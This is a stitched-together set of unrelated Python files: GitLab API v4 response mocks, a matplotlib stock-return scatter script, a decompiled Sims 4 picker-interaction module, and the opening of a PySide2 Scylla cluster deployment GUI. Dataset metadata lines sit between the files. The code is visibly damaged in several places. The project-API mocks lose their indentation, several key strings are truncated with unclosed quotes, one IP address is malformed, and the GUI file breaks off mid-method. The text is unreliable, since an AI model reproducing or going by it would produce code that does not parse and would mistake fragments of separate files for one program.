# Mock for POST /api/v4/users/1/keys (add SSH key, returns 201).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1/keys", method="post")
def resp_create_user_keys(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "title": "Private key",'
               '"key": "ssh-rsa <KEY>'
               'szUJzYPPUSRAX3BCgTqLqYx//UuVncK7YqLVSbbwjKR2Ez5lISgCnVfLVEXzwhv+xawxKWmI7hJ5S0tOv6MJ+Ixy'
               'Ta4xcKwJTwB86z22n9fVOQeJTR2dSOH1WJrf0PvRk+KVNY2jTiGHTi9AIjLnyD/jWRpOgtdfkLRc8EzAWrWlgNmH'
               '2WOKBw6za0az6XoG75obUdFVdW3qcD0xc809OHLi7FDf+E7U4wiZJCFuUizMeXyuK/SkaE1aee4Qp5R4dxTR4TP9'
               'M1XAYkf+kF0W9srZ+mhF069XD/zhUPJsvwEF",'
               '"created_at": "2014-08-01T14:47:39.080Z"}')
    content = content.encode("utf-8")
    return response(201, content, headers, None, 5, request)
'''
GROUP API
'''


# Mock for GET /api/v4/groups (group search / listing).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="get")
def resp_find_group(url, request):
    headers = {'content-type': 'application/json'}
    content = ('[{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null, "projects": []}, {"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
               '"web_url": "http://localhost:3000/groups/bar-foo", "request_access_enabled": false,'
               '"full_name": "BarFoo Group", "full_path": "bar-foo",'
               '"file_template_project_id": 1, "parent_id": null, "projects": []}]')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for GET /api/v4/groups/1 (existing group, includes its projects).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_group(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "name": "Foobar Group", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null, "projects": [{"id": 1,"description": null, "default_branch": "master",'
               '"ssh_url_to_repo": "git<EMAIL>:diaspora/diaspora-client.git",'
               '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
               '"web_url": "http://example.com/diaspora/diaspora-client",'
               '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
               '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
               '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
               '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
               '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
               '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
               '"star_count": 0}]}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for GET /api/v4/groups/1 (missing group, returns 404).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1", method="get")
def resp_get_missing_group(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(404, content, headers, None, 5, request)


# Mock for POST /api/v4/groups (top-level group creation).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_group(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "name": "<NAME>", "path": "foo-bar",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/1/foo.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar", "request_access_enabled": false,'
               '"full_name": "Foobar Group", "full_path": "foo-bar",'
               '"file_template_project_id": 1, "parent_id": null}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for POST /api/v4/groups (subgroup creation, parent_id set).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups", method="post")
def resp_create_subgroup(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 2, "name": "BarFoo Group", "path": "bar-foor",'
               '"description": "An interesting group", "visibility": "public",'
               '"lfs_enabled": true, "avatar_url": "http://localhost:3000/uploads/group/avatar/2/bar.jpg",'
               '"web_url": "http://localhost:3000/groups/foo-bar/bar-foo", "request_access_enabled": false,'
               '"full_name": "BarFoo Group", "full_path": "foo-bar/bar-foo",'
               '"file_template_project_id": 1, "parent_id": 1}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for group deletion (returns 204).
# NOTE(review): the matched path is "/api/v4/users/1", which looks
# copy-pasted from the user mocks -- confirm against the tests using it.
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/users/1", method="delete")
def resp_delete_group(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(204, content, headers, None, 5, request)
'''
GROUP MEMBER API
'''


# Mock for GET /api/v4/groups/1/members/1 (single member lookup).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="get")
def resp_get_member(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>", "state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://19172.16.58.3:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for GET /api/v4/groups/1/members (member listing).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="get")
def resp_find_member(url, request):
    headers = {'content-type': 'application/json'}
    content = ('[{"id": 1, "username": "raymond_smith", "name": "<NAME>", "state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z", "access_level": 30},{'
               '"id": 2, "username": "john_doe", "name": "<NAME>","state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root","expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 30}]')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for POST /api/v4/groups/1/members (add member, access_level 30).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members", method="post")
def resp_add_member(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>",'
               '"state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 30}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for PUT /api/v4/groups/1/members/1 (update member, access_level 10).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="put")
def resp_update_member(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>",'
               '"state": "active",'
               '"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
               '"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
               '"access_level": 10}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)
'''
DEPLOY KEY API
'''


# Mock for GET /api/v4/projects/1/deploy_keys (list deploy keys).
# NOTE(review): some payload lines below appear truncated/corrupted
# (missing closing quotes) -- restore from upstream before running.
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="get")
def resp_find_project_deploy_key(url, request):
    headers = {'content-type': 'application/json'}
    content = ('[{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa <KEY>'
               '<KEY>
               '"created_at": "2013-10-02T10:12:29Z"},{"id": 3,"title": "Another Public key",'
               '"key": "ssh-rsa <KEY>'
               '<KEY>
               '"created_at": "2013-10-02T11:12:29Z"}]')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for GET /api/v4/projects/1/deploy_keys/1 (single deploy key).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="get")
def resp_get_project_deploy_key(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
               'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
               '"created_at": "2013-10-02T10:12:29Z"}')
    content = content.encode("utf-8")
    return response(200, content, headers, None, 5, request)


# Mock for POST /api/v4/projects/1/deploy_keys (create deploy key, 201).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="post")
def resp_create_project_deploy_key(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{"id": 1,"title": "Public key",'
               '"key": "ssh-rsa A<KEY>'
               'KDKKezwkpfnxPkSMkuEspGRt/<KEY>=",'
               '"created_at": "2013-10-02T10:12:29Z"}')
    content = content.encode("utf-8")
    return response(201, content, headers, None, 5, request)


# Mock for DELETE /api/v4/projects/1/deploy_keys/1 (returns 204).
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="delete")
def resp_delete_project_deploy_key(url, request):
    headers = {'content-type': 'application/json'}
    content = ('{}')
    content = content.encode("utf-8")
    return response(204, content, headers, None, 5, request)
'''
PROJECT API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="get")
def resp_find_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="get")
def resp_get_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/foo-bar%2Fdiaspora-client", method="get")
def resp_get_project_by_name(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects", method="get")
def resp_find_group_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects/1", method="get")
def resp_get_group_project(url, request):
    """Mock ``GET /api/v4/groups/1/projects/1``: single project object."""
    body = ('{"id": 1,"description": null, "default_branch": "master",'
            '"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
            '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
            '"web_url": "http://example.com/diaspora/diaspora-client",'
            '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
            '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
            '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
            '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
            '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
            '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
            '"star_count": 0}')
    headers = {'content-type': 'application/json'}
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="post")
def resp_create_project(url, request):
    """Mock ``POST /api/v4/projects``: created project, HTTP 201."""
    body = ('{"id": 1,"description": null, "default_branch": "master",'
            '"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
            '"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
            '"web_url": "http://example.com/diaspora/diaspora-client",'
            '"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
            '"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
            '"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
            '"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
            '"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
            '"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
            '"star_count": 0}')
    headers = {'content-type': 'application/json'}
    return response(201, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="delete")
def resp_delete_project(url, request):
    """Mock ``DELETE /api/v4/projects/1``: empty body, HTTP 204."""
    headers = {'content-type': 'application/json'}
    return response(204, ('{}').encode("utf-8"), headers, None, 5, request)
'''
HOOK API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="get")
def resp_find_project_hook(url, request):
    """Mock ``GET /api/v4/projects/1/hooks``: one-element hook list."""
    body = ('[{"id": 1,"url": "http://example.com/hook","project_id": 3,'
            '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
            '"confidential_issues_events": true,"merge_requests_events": true,'
            '"tag_push_events": true,"note_events": true,"job_events": true,'
            '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
            '"created_at": "2012-10-12T17:04:47Z"}]')
    headers = {'content-type': 'application/json'}
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="get")
def resp_get_project_hook(url, request):
    """Mock ``GET /api/v4/projects/1/hooks/1``: single hook object."""
    body = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
            '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
            '"confidential_issues_events": true,"merge_requests_events": true,'
            '"tag_push_events": true,"note_events": true,"job_events": true,'
            '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
            '"created_at": "2012-10-12T17:04:47Z"}')
    headers = {'content-type': 'application/json'}
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="post")
def resp_create_project_hook(url, request):
    """Mock ``POST /api/v4/projects/1/hooks``: created hook, HTTP 201."""
    body = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
            '"push_events": true,"push_events_branch_filter": "","issues_events": true,'
            '"confidential_issues_events": true,"merge_requests_events": true,'
            '"tag_push_events": true,"note_events": true,"job_events": true,'
            '"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
            '"created_at": "2012-10-12T17:04:47Z"}')
    headers = {'content-type': 'application/json'}
    return response(201, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="delete")
def resp_delete_project_hook(url, request):
    """Mock ``DELETE /api/v4/projects/1/hooks/1``: empty body, HTTP 204."""
    headers = {'content-type': 'application/json'}
    return response(204, ('{}').encode("utf-8"), headers, None, 5, request)
'''
RUNNER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/all", method="get")
def resp_find_runners_all(url, request):
    """Mock ``GET /api/v4/runners/all``: two runners, one online, one offline."""
    body = ('[{"active": true,"description": "test-1-20150125","id": 1,'
            '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
            '"online": true,"status": "online"},{"active": true,'
            '"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
            '"is_shared": false,"name": null,"online": false,"status": "offline"}]')
    headers = {'content-type': 'application/json'}
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="get")
def resp_find_runners_list(url, request):
    """Mock ``GET /api/v4/runners`` including GitLab pagination headers."""
    headers = {'content-type': 'application/json',
               "X-Page": 1,
               "X-Next-Page": 2,
               "X-Per-Page": 1,
               "X-Total-Pages": 1,
               "X-Total": 2}
    body = ('[{"active": true,"description": "test-1-20150125","id": 1,'
            '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
            '"online": true,"status": "online"},{"active": true,'
            '"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
            '"is_shared": false,"name": null,"online": false,"status": "offline"}]')
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="get")
def resp_get_runner(url, request):
    """Mock ``GET /api/v4/runners/1``: single runner object."""
    body = ('{"active": true,"description": "test-1-20150125","id": 1,'
            '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
            '"online": true,"status": "online"}')
    headers = {'content-type': 'application/json'}
    return response(200, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="post")
def resp_create_runner(url, request):
    """Mock ``POST /api/v4/runners``: registered runner, HTTP 201."""
    body = ('{"active": true,"description": "test-1-20150125","id": 1,'
            '"is_shared": false,"ip_address": "127.0.0.1","name": null,'
            '"online": true,"status": "online"}')
    headers = {'content-type': 'application/json'}
    return response(201, body.encode("utf-8"), headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="delete")
def resp_delete_runner(url, request):
    """Mock ``DELETE /api/v4/runners/1``: empty body, HTTP 204."""
    headers = {'content-type': 'application/json'}
    return response(204, ('{}').encode("utf-8"), headers, None, 5, request)
| 2.109375 | 2 |
np/reference/ch9code/scatterprice.py | focusunsink/study_python | 0 | 12761011 | from matplotlib.finance import quotes_historical_yahoo
import sys
from datetime import date
import matplotlib.pyplot as plt
import numpy as np
# Scatter-plot one year of daily close-price returns against volume changes
# for a single ticker (default DISH, overridable via argv[1]).
today = date.today()
start = (today.year - 1, today.month, today.day)

symbol = 'DISH'

# Allow the ticker symbol to be overridden from the command line.
if len(sys.argv) == 2:
    symbol = sys.argv[1]

# NOTE(review): matplotlib.finance was removed from matplotlib and the Yahoo
# historical-quotes endpoint is defunct -- this fetch fails on modern stacks
# and needs a replacement data source.
quotes = quotes_historical_yahoo(symbol, start, today)
quotes = np.array(quotes)
close = quotes.T[4]   # column 4: closing price
volume = quotes.T[5]  # column 5: traded volume

# Simple day-over-day relative changes.
ret = np.diff(close)/close[:-1]
volchange = np.diff(volume)/volume[:-1]

fig = plt.figure()
ax = fig.add_subplot(111)
# Colour encodes the price return, marker size the volume change.
ax.scatter(ret, volchange, c=ret * 100, s=volchange * 100, alpha=0.5)
ax.set_title('Close and volume returns')
ax.grid(True)
plt.show()
| 2.6875 | 3 |
Scripts/simulation/interactions/picker/situation_picker_interaction.py | velocist/TS4CheatsInfo | 0 | 12761012 | <gh_stars>0
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\interactions\picker\situation_picker_interaction.py
# Compiled at: 2017-08-29 22:16:16
# Size of source mod 2**32: 4323 bytes
from event_testing.resolver import InteractionResolver
from filters.tunable import FilterResult
from interactions.base.picker_interaction import SimPickerInteraction, AutonomousSimPickerSuperInteraction
from interactions.base.picker_strategy import SimPickerEnumerationStrategy
from sims4.tuning.tunable import TunableList, TunableVariant, TunablePackSafeReference
from sims4.tuning.tunable_base import GroupNames
from sims4.utils import flexmethod
from situations.situation_by_definition_or_tags import SituationSearchByDefinitionOrTagsVariant
from vet.vet_picker_strategy import VetCustomerPickerEnumerationStrategy
import services, sims4
class SituationSimsPickerMixin:
    # Decompiled (uncompyle6) tuning mixin: the Sim-picker candidate list is
    # drawn from the guest lists of the tuned situations instead of from the
    # usual sim filters (which are removed below).
    INSTANCE_TUNABLES = {
        'valid_situations': SituationSearchByDefinitionOrTagsVariant(
            description='\n Situations where the guest list will be collected to populate the picker.\n ',
            tuning_group=GroupNames.PICKERTUNING),
        'job_filter': TunableList(
            description='\n If provided, only looks for Sims with the specified jobs.\n ',
            tunable=TunablePackSafeReference(manager=(services.get_instance_manager(sims4.resources.Types.SITUATION_JOB))),
            tuning_group=GroupNames.PICKERTUNING)}
    # Sim-filter based picker tuning is replaced by the situation search above.
    REMOVE_INSTANCE_TUNABLES = ('sim_filter', 'sim_filter_household_override', 'sim_filter_requesting_sim',
                                'include_uninstantiated_sims', 'include_instantiated_sims',
                                'include_actor_sim', 'include_target_sim')

    @flexmethod
    def _get_valid_sim_choices_gen(cls, inst, target, context, **kwargs):
        # Yield a FilterResult for every Sim in any matching situation that
        # passes the optional job filter and (when tuned) the picker's
        # sim_tests.  `inst` is None when called on the class (flexmethod).
        inst_or_cls = inst if inst is not None else cls
        for situation in cls.valid_situations.get_all_matching_situations():
            for sim in situation.all_sims_in_situation_gen():
                if cls.job_filter:
                    if situation.get_current_job_for_sim(sim) not in cls.job_filter:
                        continue
                if inst_or_cls.sim_tests:
                    if inst:
                        interaction_parameters = inst.interaction_parameters.copy()
                    else:
                        interaction_parameters = kwargs.copy()
                    # run the tests as if this sim had been picked
                    interaction_parameters['picked_item_ids'] = {
                        sim.sim_id}
                    resolver = InteractionResolver(cls, inst, target=target, context=context, **interaction_parameters)
                    if inst_or_cls.sim_tests.run_tests(resolver):
                        yield FilterResult(sim_info=(sim.sim_info))
                else:
                    yield FilterResult(sim_info=(sim.sim_info))
class SituationSimsPickerInteraction(SituationSimsPickerMixin, SimPickerInteraction):
    # Player-driven Sim picker whose candidates come from the tuned situations.
    pass
class AutonomousSituationSimsPickerInteraction(SituationSimsPickerMixin, AutonomousSimPickerSuperInteraction):
    """Autonomy-driven Sim picker over the tuned situations, using a
    tunable enumeration strategy to choose among the candidates."""

    INSTANCE_TUNABLES = {'choice_strategy': TunableVariant(description='\n Strategy to use for picking a Sim.\n ',
      default='default_sim_picker',
      default_sim_picker=(SimPickerEnumerationStrategy.TunableFactory()),
      vet_customer_picker=(VetCustomerPickerEnumerationStrategy.TunableFactory()),
      tuning_group=(GroupNames.PICKERTUNING))}
    REMOVE_INSTANCE_TUNABLES = ('test_compatibility', )

    def __init__(self, *args, **kwargs):
        # Bug fix: the decompiler rendered this call as
        # `(super().__init__)(args, ...)`, which passes the whole `args`
        # tuple as a single positional argument; the original bytecode
        # unpacks it with `*args`.
        super().__init__(*args, choice_enumeration_strategy=self.choice_strategy, **kwargs)
scylla.py | amoskong/scylla-cluster-manager | 0 | 12761013 | <gh_stars>0
#!/usr/bin/env python3
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
import sys
import os
import time
from concurrent.futures import ThreadPoolExecutor
import scylla_gui
import gen_cluster
import scylla_tools
import subprocess
import signal
import requests
from utils import *
_VERSION_ = '2021.01'
class MySig(QObject):
    # Qt signal carrier: worker threads emit `log` so that text is appended
    # to the GUI log widget on the main thread via a queued connection.
    log = Signal(str)
class MyMainWindow(QMainWindow, scylla_gui.Ui_MainWindow):
    """Main window: edit the cluster/node tables and deploy Scylla to the
    listed nodes over SSH/SCP from a background worker thread."""

    def __init__(self, app, parent=None):
        """
        Init function for MyMainWindow class
        """
        super(MyMainWindow, self).__init__(parent)
        self.app = app
        # NOTE(review): the first two `self.nodes` assignments are dead code
        # (immediately overwritten) -- only the loopback three-node default
        # below takes effect.
        self.nodes = [
            ["192.168.66.222", "192.168.66.222", "DC1", "RACK1", "/tmp/data/scylla", "192.168.66.222", "256", "auto", "auto"],
            ["192.168.66.200", "192.168.66.200", "DC1", "RACK1", "/tmp/data/scylla", "192.168.66.222", "256", "auto", "auto"]]
        self.nodes = [
            ["192.168.127.12", "172.31.6.66", "DC1", "RACK1", "/tmp/data/scylla", "192.168.127.12", "256", "auto", "auto"],
            ["172.16.31.10", "172.31.10.145", "DC1", "RACK1", "/tmp/data/scylla", "192.168.127.12", "256", "auto", "auto"]]
        self.nodes = [
            ["127.0.0.1", "127.0.0.1", "DC1", "RACK1", "/tmp/data/scylla/1", "127.0.0.1", "256", "1", "512"],
            ["127.0.0.2", "127.0.0.2", "DC1", "RACK1", "/tmp/data/scylla/2", "127.0.0.1", "256", "1", "512"],
            ["127.0.0.3", "127.0.0.3", "DC1", "RACK1", "/tmp/data/scylla/3", "127.0.0.1", "256", "1", "512"]]
        # Template row used when the user clicks "add node".
        self.node_default = self.nodes[0]
        self.setupUi(self)
        title = "Scylla Cluster Manager" + " - " + _VERSION_
        self.setWindowTitle(title)
        self.show_cluster_table()
        self.show_node_table()
        self.depoly_button.clicked.connect(self.deploy_button_callback)
        self.addnode_button.clicked.connect(self.addnode_button_callback)
        self.delnode_button.clicked.connect(self.delnode_button_callback)
        # Deployments run off the GUI thread so the window stays responsive.
        self.executor = ThreadPoolExecutor(max_workers=2)
        self.depoly_threads = []
        self.sig = MySig()
        self.sig.log.connect(self.log_table.append)
        self.display_logo()
        # Populate the package drop-down from the known package list.
        for i in scylla_package_list.keys():
            self.scylla_list.addItem(i)

    def display_logo(self):
        # Show the Scylla logo from the working directory.
        pixmap = QPixmap('./scylla.png')
        self.logo.setPixmap(pixmap)
        self.logo.show()

    def get_cluster_info(self):
        # Read the (single-row) cluster table back into a matrix and return
        # the first row: [cluster_name, ssh_user, ssh_key].
        row = self.cluster_table.rowCount()
        col = self.cluster_table.columnCount()
        self.cluster = [[0 for x in range(col)] for x in range(row)]
        for row in range(self.cluster_table.rowCount()):
            for col in range(self.cluster_table.columnCount()):
                self.cluster[row][col] = self.cluster_table.item(row, col).text()
        return self.cluster[0]

    def get_nodes_info(self):
        # Sync edits made in the node table widget back into self.nodes.
        for row in range(self.node_table.rowCount()):
            for col in range(self.node_table.columnCount()):
                self.nodes[row][col] = self.node_table.item(row, col).text()
        return self.nodes

    def addnode_button_callback(self):
        # Append a copy of the default row and refresh the table.
        self.nodes.append(self.node_default)
        self.show_node_table()

    def delnode_button_callback(self):
        # Remove the selected node rows, or the last row if nothing selected.
        if not self.nodes:
            QMessageBox.warning(self, 'Warning', 'There is no node can be deleted')
            return
